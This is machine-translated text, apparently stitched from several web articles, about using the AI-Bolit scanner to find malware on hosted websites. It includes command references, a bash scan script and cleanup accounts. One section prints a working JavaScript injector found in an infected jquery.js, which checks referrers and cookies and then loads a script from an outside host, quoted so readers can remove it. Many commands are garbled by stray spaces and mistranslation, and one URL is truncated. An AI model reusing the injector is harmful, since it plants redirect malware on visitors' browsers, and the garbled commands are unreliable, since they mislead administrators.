How to work with the AI-BOLIT scanner from the command line. AI-Bolit - an effective scanner for viruses and other malicious code on the hosting AI Bolit

Unpleasant situations take us by surprise. Sometimes, some users install software on their sites that has vulnerabilities. Or attackers find "holes" in software which is freely distributed. After discovering such "holes", hackers begin to exploit the victim's account and inject harmful program code, all kinds of hacker shells, backdoors, spam mailers and other malicious scripts.

Alas, some users do not update the software on their websites in time and become victims of such cybercriminals.

The essence of the problem

Our server software in most cases identifies the harmful load and automatically eliminates the “bad” activity.

What exactly does malicious software do? Very different things: it sends spam, participates in attacks on other resources, etc. ... One of the striking examples of such viruses is "MAYHEM - a multipurpose bot for * NIX servers." This virus, for example, is very popularly explained by Yandex specialists in their blog or

Hostland is constantly delighting its customers with new anti-virus tools!

We present you a very convenient and free tool for searching for viruses, malicious and hacker scripts on your account, shells based on signatures and flexible patterns, shells based on simple heuristics - everything that ordinary antiviruses and scanners cannot find.

We represent our user "AI-Bolit" from the company "Revision"

Features of the AI-Bolit scanner:

• Search for hacker php and perl scripts (shells, backdoors), virus inserts, doorways, spam mailers, scripts selling links, cloaking scripts and other types of malicious scripts. Search by patterns and regular expressions, as well as the use of simple heuristics to identify potentially malicious code
• Search for scripts with critical vulnerabilities (timthumb.php, uploadify, fckeditor, phpmyadmin, and others)
• Search for scripts that are not typical for php sites (.sh, .pl, .so, etc.)
• Search for signatures in encrypted, fragmented text blocks and hex / oct / dec encoded sequences
• Search for suspicious files with constructs used in malicious scripts
• Find hidden links in files
• Search symbolic links
• Finding the code of search and mobile redirects
• Search for connections like auto_prepend_file / auto_append_file, AddHandler
• Find iframe inserts
• Determining the version and type of cms
• Search hidden files
• Search for .php files with double extensions, .php files uploaded as GIF image
• Search for doorways and directories containing a suspiciously large number of php / html files
• Find executable binaries
• Convenient filtering and sorting of file lists in the report
• Russian interface

What else is important to know?

If malicious software was found on your account using "AI-Bolit", then simply deleting these files will not solve the problem of your site's vulnerability.

You need to find out how a hacker was able to inject a "bad" script on your site, find a "hole" in his software. Sometimes for this you need to change passwords to FTP access, update the "site engine", sometimes you need to study the server log files (if they are disabled, enable them), sometimes you need to involve a third-party security specialist.

And the whole complex of the above measures will be the best help in solving the problem of the security of your site!

Detection of all malicious scripts cannot be guaranteed. Therefore, the developer of the scanner and the hosting provider is not responsible for the possible consequences of false positives during the operation of the AI-Bolit scanner or unjustified expectations of users regarding functionality and capabilities.

You can send comments and suggestions on the script's operation, as well as undetected malicious scripts to [email protected]

The greatest functionality is available when the AI-BOLIT scanner is launched in the command line... This can be done both under Windows / Unix / Mac OS X, and directly on the hosting, if you have SSH access and the hosting does not greatly limit the processor resources consumed.

Please note that the console version PHP 7.1 or higher is required to run the scanner. More early versions not officially supported. Check the current version with php -v command

AI-BOLIT Scanner Command Line Parameter Reference

Show help

php ai-bolit.php --help

php ai-bolit.php --skip = jpg, png, gif, jpeg, JPG, PNG, GIF, bmp, xml, zip, rar, css, avi, mov

Scan specific extensions only

php ai-bolit.php --scan = php, php5, pht, phtml, pl, cgi, htaccess, suspected, tpl

Prepare a quarantine file for sending to security specialists. Archive AI-QUARANTINE-XXXX.zip with password will be created.

php ai-bolit.php --quarantine

Run the scanner in "paranoid" mode (recommended to get the most detailed report)

php ai-bolit.php --mode = 2

php ai-bolit.php --mode = 1

Check one file "pms.db" for malicious code

php ai-bolit.php -jpms.db

Run scanner with 512Mb memory size

php ai-bolit.php --memory = 512M

Install maximum size file being scanned 900Kb

php ai-bolit.php --size = 900K

Pause 500ms between files when scanning (to reduce load)

php ai-bolit.php --delay = 500

Send scan report to email [email protected]

php ai-bolit.php --report = [email protected]

Create a report in the file /home/scanned/report_site1.html

php ai-bolit.php --report = / home / scanned / report_site1.html

Scan the directory / home / s / site1 / public_html / (the report will be created there by default, if the --report = report_file option is not specified)

php ai-bolit.php --path = / home / s / site1 / public_html /

Execute the command upon completion of the scan.

php ai-bolit.php --cmd = "~ / postprocess.sh"

Get a plain-text report named site1.txt

php ai-bolit.php -lsite1.txt

You can combine calls, for example

php ai-bolit.php --size = 300K --path = / home / s / site1 / public_html / --mode = 2 --scan = php, phtml, pht, php5, pl, cgi, suspected

Combining the call to the AI-BOLIT scanner with other unix commands, you can do, for example, batch scan sites. Below is an example of checking several sites hosted within an account. For example, if the sites are located inside the / var / www / user1 / data / www directory, then the command to launch the scanner will be

find / var / www / user1 / data / www -maxdepth 1 -type d -exec php ai-bolit.php --path = () --mode = 2 \;

By adding the --report parameter, you can control the directory in which scan reports will be generated.

php ai-bolit.php parameter list ... --eng

Switch the report interface to English. This parameter should come last.

Integration with other services and into the hosting panel

php ai-bolit.php --json_report = / path / file.json

Generate a report in json format

php ai-bolit.php --progress = / path / progress.json

Save the scan status to a json file. This file will contain structured data in json format: the current scan file, how many files are scanned, how many files are left to scan, the percentage of scan, the time until the scan is completed. This mechanism can be used to show the progress bar and data on the scanned files in the panel. After scanning is complete, the file is deleted automatically.

php ai-bolit.php --handler = / path / hander.php

External event handler. You can add your own scan start / end / scan progress / scan error handlers. An example of a file can be found in the archive of the scanner, in the tools / handler.php directory. For example, after scanning is complete, you can do something with the report file (send it by mail, pack it into an archive, etc.).

Probably everyone who creates websites encounters viruses and trojans on the site. The first problem is to notice the problem in time, until the moment when projects grab pessimization from search engines or burden the hoster (for DDoS, spam).

This article is being written in hot pursuit when, during a regular backup to a machine under Windows, the sources of the ESET website Smart Security suddenly began to swear at the pictures, which he considered viral. It turned out that with the help of pictures, the FilesMan backdoor was uploaded to the site.

The hole was that the script that allowed users to upload pictures to the site checked that the picture was loaded only by the file extension. The content was not checked at all. It is not necessary to do that;) As a result, any php file could be uploaded to the site under the guise of an image. But it's not about holes ...

The point is that there was a task of daily checking all files of the site for viruses and Trojans.

Checking a website for viruses online

Online all sorts of site checks for viruses are not suitable for these purposes from the word at all. Online crawlers behave like a search engine robot, sequentially going through all the available pages of the site. The transition to the next page of the site occurs through links from other pages of the site. Corresponding if an attacker has uploaded a backdoor to your site using a picture and there is no link to this picture anywhere on the site pages and did not deface the site, as well as hang a virus on the pages, then an online check of the site for viruses simply will not find this picture and will not find a virus.

Why, you ask, would an attacker do this? Why upload a backdoor and do nothing? The answer is - for spam, for DDoS. For other malicious activity that is not reflected in any way on the pages of the site.

In a word, online check of a site for viruses is completely useless for complete peace of mind.

Plugin for checking WordPress site for viruses and Trojans

There is a great antivirus plugin for WordPress. It is called. In my case, he perfectly found pictures with FilesMan cleaned the site from viruses. But it has an important flaw. During the check, it gives a wild load to the server, because it simply iterates over all the files sequentially. In addition, out of the box check is done only manually. It is not possible to automate site checking with a plugin.

Well, you can pick up a virus from WordPress, you need something universal.

Checking the content of the site with a regular antivirus

As mentioned above, the problems were discovered quite by accident by an ordinary desktop antivirus during a backup. Of course, you can download the entire site every day and check it with a regular antivirus. All this is quite workable.

• firstly, I want automation. So that the check was in automatic mode and the results were a ready-made report.
• secondly, there are such sites that it is simply not realistic to download them every time,

Trying AI-Bolit

I delayed something with the introduction. As a result of all searches, a beautiful FREE Antivirus for site. ... This antivirus means different schemes for its use. I used it via ssh.

Whether it can be used on shared hosting - I did not understand, but I think it is possible. AI-Bolit is written in php and can be launched from the browser. Therefore, purely technically - probably it is possible on the shared.

Important! Aibolit does not cure a site for viruses - it ONLY FINDS them and gives a report which files it considers dangerous. And you decide what to do with them. Therefore, simply stupidly clicking on the button and curing the site from Trojans will not work.

How to use AI-Bolit on VDS with ssh

Aibolit has instructions and workshops on using this antivirus. In general, the sequence is simple:

• swing
• unpack to the server (I unpacked to / root / ai)
• then from the ssh console run php /root/ai/ai-bolit/ai-bolit.php
• verification can take hours, depending on the size of the site
• based on the results of the check, a report file AI-BOLIT-REPORT-<дата>-<время>.html

Problem files will be visible in the report file, if any.

Heavy load on the server

The main problem you face when automatic check site for viruses - this is the load on the server. All antiviruses act in the same way, sequentially going through all available files. And aibolit here seems to be no exception. It just takes all the files and checks them sequentially. The load jumps and it can take a long time, which is not acceptable in production.

But the aibolit has a freaky opportunity (provided that you have a full-fledged server or VDS with root access). First, for the aibolit, you can create a list of files to check, and then feed this list. Then the aibolit will just go over this list.

To form the list, you can use any server methods. I got the following bash script:

# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN = "site" AI_PATH = "/ root / ai" NOW = $ (date + " % F-% k-% M-% S ") # you can make a public folder with password access REPORT_PATH =" $ AI_PATH / reports / $ DOMAIN- $ NOW.html "SCAN_PATH =" / home / azzrael / web / $ DOMAIN / public_html / "SCAN_DAYS = 90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode = 1 --path = $ SCAN_PATH --report = $ REPORT_PATH # Scan only files changed in X days # AI-BOLIT-DOUBLECHECK.php hardcoded by Avtrom Aibolit on --with-2check !!! find $ SCAN_PATH -type f -ctime - $ SCAN_DAYS> "$ AI_PATH / ai-bolit / AI-BOLIT-DOUBLECHECK.php" #find $ SCAN_PATH -type f -name "* .ph *" -ctime - $ SCAN_DAYS> " $ AI_PATH / ai-bolit / AI-BOLIT-DOUBLECHECK.php "#find $ SCAN_PATH -type f -ctime - $ SCAN_DAYS>" $ AI_PATH / ai-bolit / AI-BOLIT-DOUBLECHECK.php "#find $ SCAN_PATH -ty f -name "* .ph *" -o -name "* .gif" -ctime - $ SCAN_DAYS> "$ AI_PATH / ai-bolit / AI-BOLIT-DOUBLECHECK.php" php "$ AI_PATH / ai-bolit / ai -bolit.php "--mode = 1 --report = $ REPORT_PATH --with-2check #history -c

Here you can see that through the find command we collect all the files created for the last SCAN_DAYS, save them to the AI-BOLIT-DOUBLECHECK.php list (for example, it was impossible to rename the list file at the time of use), then feed this list to the aibolit. SCAN_DAYS can be equal to one day. If you put bash /root/ai/run.sh in the daily kronor, then the list of files to check may not be very large. Corresponding verification will not take much time and will not load the server too much.

AI-Bolit - an effective hosted virus and other malicious code scanner

We are often asked - what is the uniqueness of the AI-Bolit scanner? How does it differ from other similar search tools for malicious code, such as maldet, clamav, or even desktop antivirus software? The short answer is that it better detects malicious code written in PHP and Perl. Why? The answer is below.

Every day, malicious code (hacker web shells, backdoors, etc.) becomes more sophisticated and complex. In addition to obfuscation of identifiers and code encryption

implicit function calls through methods with callable arguments, handlers and indirect function calls began to be used everywhere.

There are fewer and fewer malicious scripts with a linear structure and fixed identifiers. They try to disguise the code and make it as changeable as possible, "polymorphic"

or vice versa, make it as simple as possible and similar to a regular script.

Sometimes, when analyzing a malicious script, it is impossible to isolate a fixed fragment by which it would be possible to unambiguously identify the “malware”. Obviously, such malicious code cannot be found using a simple signature database ( anti-virus database), which is used by the vast majority of web antivirus and hosted scanners. To efficiently search for modern “malware”, it is necessary to use more sophisticated methods for detecting viral patterns, and in some cases - heuristics. This is the approach we use in the AI-BOLIT malware scanner.
The use of a large database of constantly improving flexible patterns based on regular expressions, the use of additional heuristic analysis, developed on the basis of scanning a large number of infected sites, made the AI-Bolit scanner the most effective and actively used tool for the administrator and web developer.

AI-Bolit is also widely known due to its simple interface and the possibility of free use for non-commercial purposes. Any webmaster can download AI-Bolit absolutely free from the official website http://revisium.com/ai/ and check their resource for hacker shells, backdoors, doorways, viruses, spam mailers, hidden links and other malicious fragments and inserts. The scanner is also actively used by commercial companies - web studios, hosting companies and internet agencies to check and treat client sites. Hosters integrate AI-Bolit into the control panel, web developers use it to search for malicious code and in their own website monitoring services.

Below is just a small list of the capabilities of the Ai-Bolit scanner:

• launch from console and browser
• three scanning modes ("simple", "expert", "paranoid") and two modes of operation ("express" and "full scan")
• search for hacker php and perl scripts (shells, backdoors), virus inserts, doorways, spam mailers, scripts selling links, cloaking scripts and other types of malicious scripts. Search by patterns and regular expressions, as well as the use of heuristics to identify potentially malicious code
• search for signatures in encrypted, fragmented text blocks and hex / oct / dec encoded sequences
• search for suspicious files with constructs used in malicious scripts
• search for hidden links in files
• search for symbolic links
• search for the code of search and mobile redirects and much more.

Official script page

Today they turned to me for help in cleaning the online store from viruses. Unexpectedly, one of the employees received a refusal to advertise Google Adwords. The letter indicated that in the file jquery.js a suspicious code is registered.

First of all, I opened the path to this file using the browser, but Avast antivirus did not react to this file, although visually I have already seen the malicious code. Then I ftp with FileZilla and tried to open the file with Notepad ++. And here my antivirus blocked access to this file.

To clean the js file from the virus, I had to disable AVAST for 10 minutes and then delete the malicious lines from the file.

If you encounter a similar problem, remove the following code as shown in the picture, or these lines.

Var r = document.referrer; var c = document.cookie; r1 = 0; if ((r.indexOf ("yandex")> 0) || (r.indexOf ("google")> 0) || (r.indexOf ("rambler")> 0) || (r.indexOf (" mail ")> 0)) (document.cookie =" __ga1 = 1; expires = Wed, 1 Mar 2020 00:00:00; path = /; "; r1 = 1;) else (if (c.indexOf (" __ga1 ") == - 1) (document.cookie =" __ga2 = 1; expires = Wed, 1 Mar 2020 00:00:00; path = /; ";)) if (((c.indexOf (" __ ga1 " )> - 1) || (r1 == 1)) && (c.indexOf ("__ ga2") == - 1)) (document.write (unescape ("% 3Cscript src =" http: // google-analyzing .com / urchin.js "type =" text / javascript "% 3E% 3C / script% 3E"));)

Site backup.

Next, we connect via ssh access, for example, using the putty utility and, if possible, make a site archive. To do this, just use the following command in the console:

tar - cf backup .tar / home / login / site / public_html

You don't have to backup the site, but you never know if you delete something important?

Now there are two options for checking the site for viruses

1. Checking the site using the php script Ai-Bolit, which looks for various viruses as well as php shell.

2. Download the entire site to your computer and run it with Avast antivirus, but the first option is much better, more convenient, and much better.

Site cleaning on local computer

At first I used the second method, so I will describe it. After all the files (or the archive) were downloaded to the computer, and there are a little more than 25,000 of them, I opened Avast and indicated the folder with the site files to check them for malicious scripts.

After Avast performed a scan, two script viruses were found in the folder with the website files:

• Php-shell-jv
• Js-Redirector-Fc

The index.php file consisted of the following code:

The javascript file "ui.datepicker_old.js" had malicious code at the very bottom of the script content. This code must be removed!

Cleaning the site from viruses using Ai-Bolit.

Ftp way.

1. Load the archive with the Aibolit script on local computer and unpack it.

2. Connect via ftp using the FileZilla client

3. Place the unpacked archive files in the main directory of the site / home / your site / public_html

4. Run the script http: // your domain / ai-bolit.php

5. The report file will be created in the main directory with the name AI-BOLIT-REPORT.html

If after running the script, a blank white screen is displayed, then the php version on the hosting server's server is not suitable for Aibolit.

Attention! If you need to check all sites in the directory, load the script into the / home / domains / or / home / folder, then Ai-Bolit will recursively go through all the folders and give a report, but it seems to me better to check one domain at a time.

Console option (SSH)

1. Launch the Putty program, or another console program.

2. Connect to the server by host and password.

3. Go to the main directory of the site with the command cd / home / your login / your site / public_html /

4. Load the script with the command wget http: //www..zip

5. Unpack zip archive team unzip 20160904_112415ai-bolit.zip

6. Run the script php ai-bolit.php

To run in background we use the command: screen -d -m php ai-bolit.php

7. We are waiting for the script to check and create a report like " AI-BOLIT-REPORT.html" on server.

Also note that if your server has php below 5.3 installed, Aibolit will show an error and will not start scanning. In my case, I had to download the site and check it on my server.

After the report file is created on the server, you can download it to your computer and view it with a regular browser (Chrome, Firefox, etc.).

First of all, you should pay attention to the report on "Malicious scripts", and then either carefully delete these files, or clean them manually, as I do.